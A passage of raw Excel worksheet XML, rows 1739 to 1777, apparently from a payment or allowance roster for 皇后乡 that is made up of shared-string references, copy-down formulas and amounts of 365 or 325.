      <c r="C1739" s="24" t="s">
        <v>4663</v>
      </c>
      <c r="D1739" s="24" t="s">
        <v>4664</v>
      </c>
      <c r="E1739" s="24" t="s">
        <v>3752</v>
      </c>
      <c r="F1739" s="24" t="s">
        <v>4665</v>
      </c>
      <c r="G1739" s="24">
        <v>1</v>
      </c>
      <c r="H1739" s="25">
        <v>365</v>
      </c>
      <c r="I1739" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1739" s="24" t="s">
        <v>4666</v>
      </c>
      <c r="K1739" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1740" customHeight="1" spans="1:11">
      <c r="A1740" s="23" t="s">
        <v>4667</v>
      </c>
      <c r="B1740" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1740" s="24" t="s">
        <v>4668</v>
      </c>
      <c r="D1740" s="24" t="s">
        <v>4669</v>
      </c>
      <c r="E1740" s="24" t="s">
        <v>3557</v>
      </c>
      <c r="F1740" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1740" s="24">
        <v>1</v>
      </c>
      <c r="H1740" s="25">
        <v>365</v>
      </c>
      <c r="I1740" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1740" s="41">
        <v>45474</v>
      </c>
      <c r="K1740" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1741" customHeight="1" spans="1:11">
      <c r="A1741" s="23" t="s">
        <v>4670</v>
      </c>
      <c r="B1741" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1741" s="74" t="s">
        <v>4153</v>
      </c>
      <c r="D1741" s="75" t="s">
        <v>4671</v>
      </c>
      <c r="E1741" s="75" t="s">
        <v>3575</v>
      </c>
      <c r="F1741" s="24" t="s">
        <v>4665</v>
      </c>
      <c r="G1741" s="24">
        <v>1</v>
      </c>
      <c r="H1741" s="25">
        <v>365</v>
      </c>
      <c r="I1741" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1741" s="74" t="s">
        <v>4672</v>
      </c>
      <c r="K1741" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1742" customHeight="1" spans="1:11">
      <c r="A1742" s="23" t="s">
        <v>4673</v>
      </c>
      <c r="B1742" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1742" s="76" t="s">
        <v>4674</v>
      </c>
      <c r="D1742" s="77" t="s">
        <v>4675</v>
      </c>
      <c r="E1742" s="78" t="s">
        <v>3662</v>
      </c>
      <c r="F1742" s="45" t="s">
        <v>3547</v>
      </c>
      <c r="G1742" s="24">
        <v>1</v>
      </c>
      <c r="H1742" s="25">
        <v>365</v>
      </c>
      <c r="I1742" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1742" s="74" t="s">
        <v>4672</v>
      </c>
      <c r="K1742" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1743" customHeight="1" spans="1:11">
      <c r="A1743" s="23" t="s">
        <v>4676</v>
      </c>
      <c r="B1743" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1743" s="79" t="s">
        <v>4677</v>
      </c>
      <c r="D1743" s="70" t="s">
        <v>4678</v>
      </c>
      <c r="E1743" s="70" t="s">
        <v>3813</v>
      </c>
      <c r="F1743" s="80" t="s">
        <v>3567</v>
      </c>
      <c r="G1743" s="24">
        <v>1</v>
      </c>
      <c r="H1743" s="25">
        <v>365</v>
      </c>
      <c r="I1743" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1743" s="81" t="s">
        <v>4672</v>
      </c>
      <c r="K1743" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1744" customHeight="1" spans="1:11">
      <c r="A1744" s="23" t="s">
        <v>4679</v>
      </c>
      <c r="B1744" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1744" s="79" t="s">
        <v>4650</v>
      </c>
      <c r="D1744" s="70" t="s">
        <v>4680</v>
      </c>
      <c r="E1744" s="70" t="s">
        <v>4681</v>
      </c>
      <c r="F1744" s="80" t="s">
        <v>3567</v>
      </c>
      <c r="G1744" s="24">
        <v>1</v>
      </c>
      <c r="H1744" s="25">
        <v>365</v>
      </c>
      <c r="I1744" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1744" s="74" t="s">
        <v>4682</v>
      </c>
      <c r="K1744" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1745" customHeight="1" spans="1:14">
      <c r="A1745" s="23" t="s">
        <v>4683</v>
      </c>
      <c r="B1745" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1745" s="79" t="s">
        <v>4684</v>
      </c>
      <c r="D1745" s="70" t="s">
        <v>4685</v>
      </c>
      <c r="E1745" s="70" t="s">
        <v>4686</v>
      </c>
      <c r="F1745" s="80" t="s">
        <v>4687</v>
      </c>
      <c r="G1745" s="24">
        <v>1</v>
      </c>
      <c r="H1745" s="25">
        <v>365</v>
      </c>
      <c r="I1745" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1745" s="74" t="s">
        <v>4682</v>
      </c>
      <c r="K1745" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1746" customHeight="1" spans="1:14">
      <c r="A1746" s="23" t="s">
        <v>4688</v>
      </c>
      <c r="B1746" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1746" s="79" t="s">
        <v>4620</v>
      </c>
      <c r="D1746" s="70" t="s">
        <v>4689</v>
      </c>
      <c r="E1746" s="70" t="s">
        <v>4690</v>
      </c>
      <c r="F1746" s="80" t="s">
        <v>3576</v>
      </c>
      <c r="G1746" s="24">
        <v>1</v>
      </c>
      <c r="H1746" s="25">
        <v>365</v>
      </c>
      <c r="I1746" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1746" s="74" t="s">
        <v>4682</v>
      </c>
      <c r="K1746" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1747" customHeight="1" spans="1:14">
      <c r="A1747" s="23" t="s">
        <v>4691</v>
      </c>
      <c r="B1747" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1747" s="24" t="s">
        <v>4650</v>
      </c>
      <c r="D1747" s="24" t="s">
        <v>4692</v>
      </c>
      <c r="E1747" s="24" t="s">
        <v>3641</v>
      </c>
      <c r="F1747" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1747" s="24">
        <v>1</v>
      </c>
      <c r="H1747" s="25">
        <v>365</v>
      </c>
      <c r="I1747" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1747" s="41">
        <v>45474</v>
      </c>
      <c r="K1747" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1748" customHeight="1" spans="1:14">
      <c r="A1748" s="23" t="s">
        <v>4693</v>
      </c>
      <c r="B1748" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1748" s="24" t="s">
        <v>4694</v>
      </c>
      <c r="D1748" s="24" t="s">
        <v>4695</v>
      </c>
      <c r="E1748" s="24" t="s">
        <v>1981</v>
      </c>
      <c r="F1748" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1748" s="24">
        <v>1</v>
      </c>
      <c r="H1748" s="25">
        <v>365</v>
      </c>
      <c r="I1748" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1748" s="41">
        <v>45658</v>
      </c>
      <c r="K1748" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1749" customHeight="1" spans="1:14">
      <c r="A1749" s="23" t="s">
        <v>4696</v>
      </c>
      <c r="B1749" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1749" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1749" s="24" t="s">
        <v>4697</v>
      </c>
      <c r="E1749" s="24" t="s">
        <v>4296</v>
      </c>
      <c r="F1749" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1749" s="24">
        <v>1</v>
      </c>
      <c r="H1749" s="25">
        <v>365</v>
      </c>
      <c r="I1749" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1749" s="41">
        <v>45717</v>
      </c>
      <c r="K1749" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1750" customHeight="1" spans="1:14">
      <c r="A1750" s="23" t="s">
        <v>4698</v>
      </c>
      <c r="B1750" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1750" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1750" s="24" t="s">
        <v>4699</v>
      </c>
      <c r="E1750" s="24" t="s">
        <v>4700</v>
      </c>
      <c r="F1750" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1750" s="24">
        <v>1</v>
      </c>
      <c r="H1750" s="25">
        <v>365</v>
      </c>
      <c r="I1750" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1750" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1750" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1751" s="5" customFormat="1" customHeight="1" spans="1:14">
      <c r="A1751" s="23" t="s">
        <v>4701</v>
      </c>
      <c r="B1751" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1751" s="82" t="s">
        <v>4153</v>
      </c>
      <c r="D1751" s="83" t="s">
        <v>4702</v>
      </c>
      <c r="E1751" s="83" t="s">
        <v>3922</v>
      </c>
      <c r="F1751" s="80" t="s">
        <v>3576</v>
      </c>
      <c r="G1751" s="24">
        <v>1</v>
      </c>
      <c r="H1751" s="25">
        <v>365</v>
      </c>
      <c r="I1751" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1751" s="84" t="s">
        <v>3080</v>
      </c>
      <c r="K1751" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L1751" s="8"/>
      <c r="M1751" s="8"/>
      <c r="N1751" s="8"/>
    </row>
    <row r="1752" customHeight="1" spans="1:14">
      <c r="A1752" s="23" t="s">
        <v>4703</v>
      </c>
      <c r="B1752" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1752" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1752" s="24" t="s">
        <v>4704</v>
      </c>
      <c r="E1752" s="24" t="s">
        <v>4705</v>
      </c>
      <c r="F1752" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1752" s="24">
        <v>1</v>
      </c>
      <c r="H1752" s="25">
        <v>365</v>
      </c>
      <c r="I1752" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1752" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1752" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1753" customHeight="1" spans="1:14">
      <c r="A1753" s="23" t="s">
        <v>4706</v>
      </c>
      <c r="B1753" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1753" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1753" s="24" t="s">
        <v>4708</v>
      </c>
      <c r="E1753" s="24" t="s">
        <v>4709</v>
      </c>
      <c r="F1753" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1753" s="24">
        <v>2</v>
      </c>
      <c r="H1753" s="25">
        <v>325</v>
      </c>
      <c r="I1753" s="24">
        <f t="shared" si="27"/>
        <v>650</v>
      </c>
      <c r="J1753" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1753" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1754" customHeight="1" spans="1:14">
      <c r="A1754" s="23" t="s">
        <v>4711</v>
      </c>
      <c r="B1754" s="24" t="str">
        <f>B1753</f>
        <v>皇后乡</v>
      </c>
      <c r="C1754" s="24" t="str">
        <f>C1753</f>
        <v>皇后乡</v>
      </c>
      <c r="D1754" s="23" t="s">
        <v>4712</v>
      </c>
      <c r="E1754" s="23" t="s">
        <v>4713</v>
      </c>
      <c r="F1754" s="24" t="str">
        <f>F1753</f>
        <v>4113210615</v>
      </c>
      <c r="G1754" s="24"/>
      <c r="H1754" s="24"/>
      <c r="I1754" s="24">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="J1754" s="24"/>
      <c r="K1754" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1755" customHeight="1" spans="1:14">
      <c r="A1755" s="23" t="s">
        <v>4714</v>
      </c>
      <c r="B1755" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1755" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1755" s="24" t="s">
        <v>4715</v>
      </c>
      <c r="E1755" s="24" t="s">
        <v>4716</v>
      </c>
      <c r="F1755" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1755" s="24">
        <v>1</v>
      </c>
      <c r="H1755" s="25">
        <v>365</v>
      </c>
      <c r="I1755" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1755" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1755" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1756" customHeight="1" spans="1:14">
      <c r="A1756" s="23" t="s">
        <v>4717</v>
      </c>
      <c r="B1756" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1756" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1756" s="24" t="s">
        <v>4718</v>
      </c>
      <c r="E1756" s="24" t="s">
        <v>2199</v>
      </c>
      <c r="F1756" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1756" s="24">
        <v>2</v>
      </c>
      <c r="H1756" s="25">
        <v>325</v>
      </c>
      <c r="I1756" s="24">
        <f t="shared" si="27"/>
        <v>650</v>
      </c>
      <c r="J1756" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1756" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1757" customHeight="1" spans="1:14">
      <c r="A1757" s="23" t="s">
        <v>4719</v>
      </c>
      <c r="B1757" s="24" t="str">
        <f>B1756</f>
        <v>皇后乡</v>
      </c>
      <c r="C1757" s="24" t="str">
        <f>C1756</f>
        <v>皇后乡</v>
      </c>
      <c r="D1757" s="23" t="s">
        <v>4720</v>
      </c>
      <c r="E1757" s="23" t="s">
        <v>4721</v>
      </c>
      <c r="F1757" s="24" t="str">
        <f>F1756</f>
        <v>4113210615</v>
      </c>
      <c r="G1757" s="24"/>
      <c r="H1757" s="24"/>
      <c r="I1757" s="24">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="J1757" s="24"/>
      <c r="K1757" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1758" customHeight="1" spans="1:14">
      <c r="A1758" s="23" t="s">
        <v>4722</v>
      </c>
      <c r="B1758" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1758" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1758" s="24" t="s">
        <v>4723</v>
      </c>
      <c r="E1758" s="24" t="s">
        <v>4724</v>
      </c>
      <c r="F1758" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1758" s="24">
        <v>2</v>
      </c>
      <c r="H1758" s="25">
        <v>325</v>
      </c>
      <c r="I1758" s="24">
        <f t="shared" si="27"/>
        <v>650</v>
      </c>
      <c r="J1758" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1758" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1759" customHeight="1" spans="1:14">
      <c r="A1759" s="23" t="s">
        <v>4725</v>
      </c>
      <c r="B1759" s="24" t="str">
        <f>B1758</f>
        <v>皇后乡</v>
      </c>
      <c r="C1759" s="24" t="str">
        <f>C1758</f>
        <v>皇后乡</v>
      </c>
      <c r="D1759" s="23" t="s">
        <v>4726</v>
      </c>
      <c r="E1759" s="23" t="s">
        <v>4727</v>
      </c>
      <c r="F1759" s="24" t="str">
        <f>F1758</f>
        <v>4113210615</v>
      </c>
      <c r="G1759" s="24"/>
      <c r="H1759" s="24"/>
      <c r="I1759" s="24">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="J1759" s="24"/>
      <c r="K1759" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1760" customHeight="1" spans="1:14">
      <c r="A1760" s="23" t="s">
        <v>4728</v>
      </c>
      <c r="B1760" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1760" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1760" s="24" t="s">
        <v>4729</v>
      </c>
      <c r="E1760" s="24" t="s">
        <v>4730</v>
      </c>
      <c r="F1760" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1760" s="24">
        <v>1</v>
      </c>
      <c r="H1760" s="25">
        <v>365</v>
      </c>
      <c r="I1760" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1760" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1760" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1761" customHeight="1" spans="1:11">
      <c r="A1761" s="23" t="s">
        <v>4731</v>
      </c>
      <c r="B1761" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1761" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1761" s="24" t="s">
        <v>3718</v>
      </c>
      <c r="E1761" s="24" t="s">
        <v>4732</v>
      </c>
      <c r="F1761" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1761" s="24">
        <v>1</v>
      </c>
      <c r="H1761" s="25">
        <v>365</v>
      </c>
      <c r="I1761" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1761" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1761" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1762" customHeight="1" spans="1:11">
      <c r="A1762" s="23" t="s">
        <v>4733</v>
      </c>
      <c r="B1762" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1762" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1762" s="24" t="s">
        <v>4734</v>
      </c>
      <c r="E1762" s="24" t="s">
        <v>4735</v>
      </c>
      <c r="F1762" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1762" s="24">
        <v>1</v>
      </c>
      <c r="H1762" s="25">
        <v>365</v>
      </c>
      <c r="I1762" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1762" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1762" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1763" customHeight="1" spans="1:11">
      <c r="A1763" s="23" t="s">
        <v>4736</v>
      </c>
      <c r="B1763" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1763" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1763" s="24" t="s">
        <v>4737</v>
      </c>
      <c r="E1763" s="24" t="s">
        <v>4738</v>
      </c>
      <c r="F1763" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1763" s="24">
        <v>1</v>
      </c>
      <c r="H1763" s="25">
        <v>365</v>
      </c>
      <c r="I1763" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1763" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1763" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1764" customHeight="1" spans="1:11">
      <c r="A1764" s="23" t="s">
        <v>4739</v>
      </c>
      <c r="B1764" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1764" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1764" s="24" t="s">
        <v>4740</v>
      </c>
      <c r="E1764" s="24" t="s">
        <v>2199</v>
      </c>
      <c r="F1764" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1764" s="24">
        <v>1</v>
      </c>
      <c r="H1764" s="25">
        <v>365</v>
      </c>
      <c r="I1764" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1764" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1764" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1765" customHeight="1" spans="1:11">
      <c r="A1765" s="23" t="s">
        <v>4741</v>
      </c>
      <c r="B1765" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1765" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1765" s="24" t="s">
        <v>4742</v>
      </c>
      <c r="E1765" s="24" t="s">
        <v>4743</v>
      </c>
      <c r="F1765" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1765" s="24">
        <v>1</v>
      </c>
      <c r="H1765" s="25">
        <v>365</v>
      </c>
      <c r="I1765" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1765" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1765" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1766" customHeight="1" spans="1:11">
      <c r="A1766" s="23" t="s">
        <v>4744</v>
      </c>
      <c r="B1766" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1766" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1766" s="24" t="s">
        <v>4745</v>
      </c>
      <c r="E1766" s="24" t="s">
        <v>4746</v>
      </c>
      <c r="F1766" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1766" s="24">
        <v>2</v>
      </c>
      <c r="H1766" s="25">
        <v>325</v>
      </c>
      <c r="I1766" s="24">
        <f t="shared" si="27"/>
        <v>650</v>
      </c>
      <c r="J1766" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1766" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1767" customHeight="1" spans="1:11">
      <c r="A1767" s="23" t="s">
        <v>4747</v>
      </c>
      <c r="B1767" s="24" t="str">
        <f>B1766</f>
        <v>皇后乡</v>
      </c>
      <c r="C1767" s="24" t="str">
        <f>C1766</f>
        <v>皇后乡</v>
      </c>
      <c r="D1767" s="23" t="s">
        <v>4748</v>
      </c>
      <c r="E1767" s="23" t="s">
        <v>4749</v>
      </c>
      <c r="F1767" s="24" t="str">
        <f>F1766</f>
        <v>4113210615</v>
      </c>
      <c r="G1767" s="24"/>
      <c r="H1767" s="24"/>
      <c r="I1767" s="24">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="J1767" s="24"/>
      <c r="K1767" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1768" customHeight="1" spans="1:11">
      <c r="A1768" s="23" t="s">
        <v>4750</v>
      </c>
      <c r="B1768" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1768" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1768" s="24" t="s">
        <v>4751</v>
      </c>
      <c r="E1768" s="24" t="s">
        <v>4752</v>
      </c>
      <c r="F1768" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1768" s="24">
        <v>1</v>
      </c>
      <c r="H1768" s="25">
        <v>365</v>
      </c>
      <c r="I1768" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1768" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1768" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1769" customHeight="1" spans="1:11">
      <c r="A1769" s="23" t="s">
        <v>4753</v>
      </c>
      <c r="B1769" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1769" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1769" s="24" t="s">
        <v>4754</v>
      </c>
      <c r="E1769" s="24" t="s">
        <v>4755</v>
      </c>
      <c r="F1769" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1769" s="24">
        <v>1</v>
      </c>
      <c r="H1769" s="25">
        <v>365</v>
      </c>
      <c r="I1769" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1769" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1769" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1770" customHeight="1" spans="1:11">
      <c r="A1770" s="23" t="s">
        <v>4756</v>
      </c>
      <c r="B1770" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1770" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1770" s="24" t="s">
        <v>4757</v>
      </c>
      <c r="E1770" s="24" t="s">
        <v>4758</v>
      </c>
      <c r="F1770" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1770" s="24">
        <v>2</v>
      </c>
      <c r="H1770" s="25">
        <v>325</v>
      </c>
      <c r="I1770" s="24">
        <f t="shared" si="27"/>
        <v>650</v>
      </c>
      <c r="J1770" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1770" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1771" customHeight="1" spans="1:11">
      <c r="A1771" s="23" t="s">
        <v>4759</v>
      </c>
      <c r="B1771" s="24" t="str">
        <f>B1770</f>
        <v>皇后乡</v>
      </c>
      <c r="C1771" s="24" t="str">
        <f>C1770</f>
        <v>皇后乡</v>
      </c>
      <c r="D1771" s="23" t="s">
        <v>4760</v>
      </c>
      <c r="E1771" s="23" t="s">
        <v>4761</v>
      </c>
      <c r="F1771" s="24" t="str">
        <f>F1770</f>
        <v>4113210615</v>
      </c>
      <c r="G1771" s="24"/>
      <c r="H1771" s="24"/>
      <c r="I1771" s="24">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="J1771" s="24"/>
      <c r="K1771" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1772" customHeight="1" spans="1:11">
      <c r="A1772" s="23" t="s">
        <v>4762</v>
      </c>
      <c r="B1772" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1772" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1772" s="24" t="s">
        <v>4763</v>
      </c>
      <c r="E1772" s="24" t="s">
        <v>4764</v>
      </c>
      <c r="F1772" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1772" s="24">
        <v>1</v>
      </c>
      <c r="H1772" s="25">
        <v>365</v>
      </c>
      <c r="I1772" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1772" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1772" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1773" customHeight="1" spans="1:11">
      <c r="A1773" s="23" t="s">
        <v>4765</v>
      </c>
      <c r="B1773" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1773" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1773" s="24" t="s">
        <v>4766</v>
      </c>
      <c r="E1773" s="24" t="s">
        <v>4767</v>
      </c>
      <c r="F1773" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1773" s="24">
        <v>2</v>
      </c>
      <c r="H1773" s="25">
        <v>325</v>
      </c>
      <c r="I1773" s="24">
        <f t="shared" si="27"/>
        <v>650</v>
      </c>
      <c r="J1773" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1773" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1774" customHeight="1" spans="1:11">
      <c r="A1774" s="23" t="s">
        <v>4768</v>
      </c>
      <c r="B1774" s="24" t="str">
        <f>B1773</f>
        <v>皇后乡</v>
      </c>
      <c r="C1774" s="24" t="str">
        <f>C1773</f>
        <v>皇后乡</v>
      </c>
      <c r="D1774" s="23" t="s">
        <v>4769</v>
      </c>
      <c r="E1774" s="23" t="s">
        <v>4770</v>
      </c>
      <c r="F1774" s="24" t="str">
        <f>F1773</f>
        <v>4113210615</v>
      </c>
      <c r="G1774" s="24"/>
      <c r="H1774" s="24"/>
      <c r="I1774" s="24">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="J1774" s="24"/>
      <c r="K1774" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1775" customHeight="1" spans="1:11">
      <c r="A1775" s="23" t="s">
        <v>4771</v>
      </c>
      <c r="B1775" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1775" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1775" s="24" t="s">
        <v>4772</v>
      </c>
      <c r="E1775" s="24" t="s">
        <v>4746</v>
      </c>
      <c r="F1775" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1775" s="24">
        <v>2</v>
      </c>
      <c r="H1775" s="25">
        <v>325</v>
      </c>
      <c r="I1775" s="24">
        <f t="shared" si="27"/>
        <v>650</v>
      </c>
      <c r="J1775" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1775" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1776" customHeight="1" spans="1:11">
      <c r="A1776" s="23" t="s">
        <v>4773</v>
      </c>
      <c r="B1776" s="24" t="str">
        <f>B1775</f>
        <v>皇后乡</v>
      </c>
      <c r="C1776" s="24" t="str">
        <f>C1775</f>
        <v>皇后乡</v>
      </c>
      <c r="D1776" s="23" t="s">
        <v>4774</v>
      </c>
      <c r="E1776" s="23" t="s">
        <v>4775</v>
      </c>
      <c r="F1776" s="24" t="str">
        <f>F1775</f>
        <v>4113210615</v>
      </c>
      <c r="G1776" s="24"/>
      <c r="H1776" s="24"/>
      <c r="I1776" s="24">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="J1776" s="24"/>
      <c r="K1776" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1777" customHeight="1" spans="1:11">
      <c r="A1777" s="23" t="s">
        <v>4776</v>
      </c>
      <c r="B1777" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1777" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1777" s="24" t="s">
        <v>4777</v>
      </c>
      <c r="E1777" s="24" t="s">
        <v>4778</v>
      </c>
      <c r="F1777" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1777" s="24">
